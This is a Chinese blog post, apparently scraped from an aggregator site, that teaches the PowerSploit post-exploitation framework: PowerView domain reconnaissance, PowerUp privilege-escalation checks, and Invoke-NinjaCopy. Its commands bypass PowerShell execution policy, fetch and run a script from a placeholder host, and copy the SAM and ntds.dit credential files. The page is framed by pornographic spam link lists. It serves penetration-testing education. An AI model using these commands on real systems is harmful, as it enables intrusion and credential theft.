日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

PowerSploit脚本

發布時間:2024/6/3 编程问答 36 豆豆
生活随笔 收集整理的這篇文章主要介紹了 PowerSploit脚本 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

PowerSploit

PowerSploit的用法

PowerView.ps1腳本的使用

PowerUp.ps1腳本的使用

Invoke-Allchecks模塊

Invoke-NinjaCopy.ps1腳本的使用

PowerSploit

PowerSploit是一款基于PowerShell的后滲透框架軟件,包含了很多PowerShell的攻擊腳本,它們主要用于滲透中的信息偵測,權限提升、權限維持等。PowerSploit項目地址:https://github.com/PowerShellMafia/PowerSploit

  • ActivirusBypass:發現殺毒軟件的查殺特征
  • CodeExecution:在目標主機上執行代碼
  • Exfiltration:目標主機上的信息搜集工具
  • Mayhem:藍屏等破壞性的腳本
  • Persistence:后門腳本
  • Privsec:提權等腳本
  • Recon:以目標主機為跳板進行內網信息偵查
  • ScriptModification:在目標主機上創建或修改腳本

本文主要講的是PowerSploit用于搜索域信息的模塊,其他模塊用法一致。

PowerSploit的用法

首先,我們想用里面哪個腳本,就先下載該腳本,然后導入該腳本,執行其中的模塊。我們以PowerView.ps1腳本為例,該腳本主要用于搜集域信息。

我們先下載PowerView.ps1腳本到本地,然后在當前目錄下打開cmd,執行以下命令執行PowerView.ps1腳本中的Get-NetDomain模塊,如果要執行該腳本的其他模塊,亦是如此

powershell -exec bypass Import-Module .\powerview.ps1;Get-NetDomain

如果需要遠程加載模塊的話,我們先將PowerView.ps1放到我們的http服務目錄下,然后執行以下命令

powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://xx.xx.xx.xx/powerview.ps1');import-module .\powerview.ps1;Get-NetDomain

PowerView.ps1腳本的使用

PowerView.ps1腳本位于PowerSploit的Recon目錄下,該模塊主要用于域內信息的收集。

該腳本有以下一些模塊

  • Get-NetDomain #查看域名稱
  • Get-NetDomainController #獲取域控的信息
  • Get-NetForest #查看域內詳細的信息
  • Get-Netuser #獲取域內所有用戶的詳細信息
  • Get-NetUser | select name #獲得域內所有用戶名
  • Get-NetGroup #獲取域內所有組信息
  • Get-NetGroup | select name #獲取域內所有的組名
  • Get-NetGroup *admin* | select name #獲得域內組中帶有admin的
  • Get-NetGroup "Domain Admins" #查看組"Domain Admins"組的信息
  • Get-NetGroup -UserName test #獲得域內組中用戶test的信息
  • Get-UserEvent #獲取指定用戶日志信息
  • Get-NetComputer #獲取域內所有機器的詳細信息
  • Get-NetComputer | select name #獲得域內主機的名字
  • Get-Netshare #獲取本機的網絡共享
  • Get-NetProcess #獲取本機進程的詳細信息
  • Get-NetOU #獲取域內OU信息
  • Get-NetFileServer #根據SPN獲取當前域使用的文件服務器
  • Get-NetSession #獲取在指定服務器存在的Session信息
  • Get-NetRDPSESSION #獲取本機的RDP連接session信息
  • Get-NetGPO #獲取域內所有組策略對象
  • Get-ADOBJECT #獲取活動目錄的信息
  • Get-DomainPolicy #獲取域默認策略
  • Invoke-UserHunter #查詢指定用戶登錄過的機器
  • Invoke-EnumerateLocalAdmin #枚舉出本地的管理員信息
  • Invoke-ProcessHunter #判斷當前機器哪些進程有管理員權限
  • Invoke-UserEventHunter #根據用戶日志獲取某域用戶登陸過哪些域機器
  • PowerUp.ps1腳本的使用

    PowerUp.ps1腳本是 Privsec 目錄下的一個腳本,功能非常強大。擁有很多用來尋找目標主機Windows服務配置錯誤來進行提權的模塊。當我們無法通過 windows 內核漏洞進行提權的話,這個時候我們就可以利用該腳本來尋找目標主機上Windows服務配置錯誤來進行提權,或者利用常見的系統服務,通過其繼承的系統權限來完成提權。

    我們來看下該腳本下模塊的功能:

    Service Enumeration(服務枚舉)

  • Get-ServiceUnquoted 該模塊返回包含空格但是沒有引號的服務路徑的服務
  • Get-ModifiableServiceFile 該模塊返回當前用戶可以修改服務的二進制文件或修改其配置文件的服務
  • Get-ModifiableService 該模塊返回當前用戶能修改的服務
  • Get-ServiceDetail 該模塊用于返回某服務的信息,用法:?Get-ServiceDetail?-servicename? 服務名
  • Service Abuse(服務濫用)?

  • Invoke-ServiceAbuse 該模塊通過修改服務來添加用戶到指定組,并可以通過設置 -cmd?參數觸發添加用戶的自定義命令
  • Write-ServiceBinary 該模塊通過寫入一個修補的C#服務二進制文件,它可以添加本地管理程序或執行自定義命令,Write-ServiceBinaryInstall-ServiceBinary不同之處自安于,前者生成可執行文件,后者直接安裝服務
  • Install-ServiceBinary 該模塊通過Write-ServiceBinary寫一個C#的服務用來添加用戶,
  • Restore-ServiceBinary 該模塊用于恢復服務的可執行文件到原始目錄,使用:Restore-ServiceBinary -servicename 服務名
  • DLL Hijacking(DLL注入)?

  • Find-ProcessDLLHijack 該模塊查找當前正在運行的進程潛在的dll劫持機會。
  • Find-PathDLLHijack 該模塊用于檢查當前 %path% 的哪些目錄是用戶可以寫入的
  • Write-HijackDll 該模塊可寫入可劫持的dll
  • Registry Checks(注冊審核)

  • Get-RegistryAlwaysInstallElevated 該模塊用于檢查AlwaysInstallElevated注冊表項是否被設置,如果已被設置,則意味著SAM文件是以System權限運行的
  • Get-RegistryAutoLogon 該模塊用于檢測Winlogin注冊表的AutoAdminLogon項是否被設置,可用于查詢默認的用戶名和密碼
  • Get-ModifiableRegistryAutoRun 該模塊用于檢查開機自啟的應用程序路徑和注冊表鍵值,然后返回當前用戶可修改的程序路徑,被檢查的注冊表鍵值有以下:
  • HKLM\Software\Microsoft\Windows\CurrentVersino\Run
  • HKLM\Software\Microsoft\Windows\CurrentVersino\RunOnce
  • HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
  • HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunService
  • HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceService
  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunService
  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceService
  • Miscellaneous Checks(雜項審核)?

  • Get-ModifiableScheduledTaskFile 該模塊用于返回當前用戶能夠修改的計劃任務程序的名稱和路徑?
  • Get-Webconfig 該模塊用于返回當前服務器上web.config文件中的數據庫連接字符串的明文
  • Get-ApplicationHost 該模塊利用系統上的applicationHost.config文件恢復加密過的應用池和虛擬目錄的密碼
  • Get-SiteListPassword 該模塊檢索任何已找到的McAfee的SiteList.xml文件的明文密碼
  • Get-CachedGPPPassword 該模塊檢查緩存的組策略首選項文件中的密碼
  • Get-UnattendedInstallFile 該模塊用于檢查以下路徑,查找是否存在這些文件,因為這些文件可能含有部署憑據?
  • C:\sysprep\sysprep.xml
  • C:\sysprep\sysprep.inf
  • C:\sysprep.inf
  • C:\Windows\Panther\Unattended.xml
  • C:\Windows\Panther\Unattend\Unattended.xml
  • C:\Windows\Panther\Unattend.xml
  • C:\Windows\Panther\Unattend\Unattend.xml
  • C:\Windows\System32\Sysprep\unattend.xml
  • C:\Windows\System32\Sysprep\Panther\unattend.xml
  • Other Helpers/Meta-Functions(其他一些模塊的幫助)?

  • Get-ModifiablePath 該模塊標記輸入字符串并返回當前用戶可以修改的文件
  • Get-CurrentUserTokenGroupSid 該模塊返回當前用戶參與的所有小島嶼發展中國家,無論它們是否已禁用。
  • Add-ServiceDacl 該模塊將dacl字段添加到get-service返回的服務對象中
  • Set-ServiceBinPath 該模塊通過Win 32 api方法將服務的二進制路徑設置為指定的值。
  • Test-ServiceDaclPermission 該模塊用于檢查所有可用的服務,并嘗試對這些打開的服務進行修改。如果能修改,則返回該服務對象。使用:Test-ServiceDaclPermission -servicename 服務名
  • Write-UserAddMSI 該模塊寫入一個MSI安裝程序,提示要添加一個用戶。
  • Invoke-AllChecks 該模塊會自動執行 PowerUp.ps1 下所有的模塊來檢查目標主機是否存在服務配置漏洞? ?
  • 以下是這些模塊提權的原理:?

    • Get-ServiceUnquoted 模塊提權 (該模塊利用了Windows的一個邏輯漏洞,即當文件包含空格時,WindowsAPI會解釋為兩個路徑,并將這兩個文件同時執行,這個漏洞在有些時候會造成權限的提升)。
    • Test-ServiceDaclPermission 模塊提權 (該模塊會檢查所有可用的服務,并嘗試對這些打開的服務進行修改,如果可修改,則存在此漏洞)。Windows系統服務文件在操作系統啟動時會加載執行,并且在后臺調用可執行文件。比如在每次重啟系統時,Java升級程序都會檢測出Oracle網站是否有新版Java程序。而類似Java程序之類的系統服務程序,在加載時往往都是運行在系統權限上的。所以如果一個低權限的用戶對于此類系統服務調用的可執行文件具有可寫的權限,那么就可以將其替換成我們的惡意可執行文件,從而隨著系統啟動服務器獲得系統權限。。?

    Invoke-Allchecks模塊

    powershell -exec bypass -c import-module .\PowerUp.ps1;Invoke-Allchecks -verbose

    運行該腳本,該腳本會自動檢查PowerUp.ps1下所有的模塊,并在存在漏洞利用的模塊下的AbuseFunction中直接給出利用方法

    Invoke-NinjaCopy.ps1腳本的使用

    該腳本在Exfiltration目錄下,該文件的作用是復制一些系統無法復制的文件,比如sam文件。還可以在域環境中傳輸文件(前提是執行命令的用戶是域用戶)

    注:該腳本需要管理員權限運行

    復制文件

  • Import-Module .\Invoke-NinjaCopy.ps1
  • Invoke-NinjaCopy -Path C:\Windows\system32\config\sam -Verbose -LocalDestination C:\Users\administrator\Desktop\sam
  • 域環境中傳輸文件

    Copy-Item '\\dc.offensive.local\C$\Users\administrator\Desktop\ntds.dit'-Destination '\\Client1.offensive.local\C$\Users\alice\Desktop\tools\ntds.dit' #將dc.offensive.local主機上c:\users\administrator\desktop\ntds.dit文件復制到 Client1.offensive.local 主機的C:\users\alice\Desktop\tools\ntds.dit文件

    未完待續。。。。。。。。。

    參考書籍:《Web安全攻防-滲透測試實戰指南》

    相關文章:PowerShell使用淺析

    ? ? ? ? ? ? ? ? ??PowerView:一個可以幫助你躲避檢測的內網信息收集腳本

    ?

    總結

    以上是生活随笔為你收集整理的PowerSploit脚本的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 成人性做爰aaa片免费 | 特级西西444www高清大视频 | 伊人久久免费视频 | 少妇名器的沉沦 | 精品一区二区三区免费观看 | 奇米888一区二区三区 | 女女综合网| av网站在线免费 | 被警察猛c猛男男男 | 老女人一区 | 中国精品久久 | 91精品免费视频 | 日本激情网 | 四虎影库永久在线 | 久久久久久av | 午夜肉伦伦 | 极品白嫩丰满少妇无套 | 上海毛片 | 欧美色图综合网 | 超碰综合在线 | 亚洲天堂网站 | 久久色视频 | 亚洲精品888| www.五月婷婷.com | 99精品一级欧美片免费播放 | 在线观看不卡一区 | www.欧美亚洲 | 最新超碰| 成人黄色免费网 | 狂野欧美性猛交xxxx | 亚洲精品欧美 | 怡红院最新网址 | 国产成人一区二区三区别 | 性——交——性——乱免费的 | 一级做a爰 | 一级黄色片在线 | 精品97人妻无码中文永久在线 | 成人av一区二区三区 | 国内偷拍精品视频 | 欧美日韩免费一区 | 中文字幕一区三区 | 影音先锋成人资源网站 | 美国黄色a级片 | 亚洲精品在线中文字幕 | 日韩一区二区三区视频在线观看 | 亚洲av鲁丝一区二区三区 | 日本美女视频一区 | 精品免费视频一区二区 | 一区二区日韩视频 | 少妇资源 | 中文字幕永久在线 | 久久精品欧美 | 最新国产露脸在线观看 | 阿v天堂在线 | hitomi一区二区三区精品 | 在线一级 | 综合久久网 | 成人免费播放 | 内地毛片 | 超碰免费在线播放 | 99视频在线免费 | 色优久久 | av丝袜在线观看 | 中文字幕永久在线视频 | aa在线| 韩国伦理大片 | 饥渴放荡受np公车奶牛 | 欧美国产精品一区 | 综合激情网 | 在线观看h网站 | 欧美激情18p | 黄色三级网站在线观看 | 国产美女明星三级做爰 | 久久av在线 | 无码人妻一区二区三区精品视频 | 国产精品成人久久久 | 综合在线观看 | 深夜福利成人 | 国产v片 | 男插女青青影院 | 日韩精品在线免费视频 | 日韩av一区二区在线 | 精品一区二区三区蜜桃 | 日本少妇一级 | 美女扒开内看个够网站 | 色视频网址 | 波多野结衣午夜 | 日韩国产电影 | 国产午夜精品福利 | 欧美性爱精品一区 | 日韩av在线第一页 | 亚洲AV无码国产精品播放在线 | 欧美亚洲专区 | 天码人妻一区二区三区在线看 | 午夜黄色网 | 欧美日韩精| 免费播放黄色片 | 99久久久久 | 黄色天堂网 |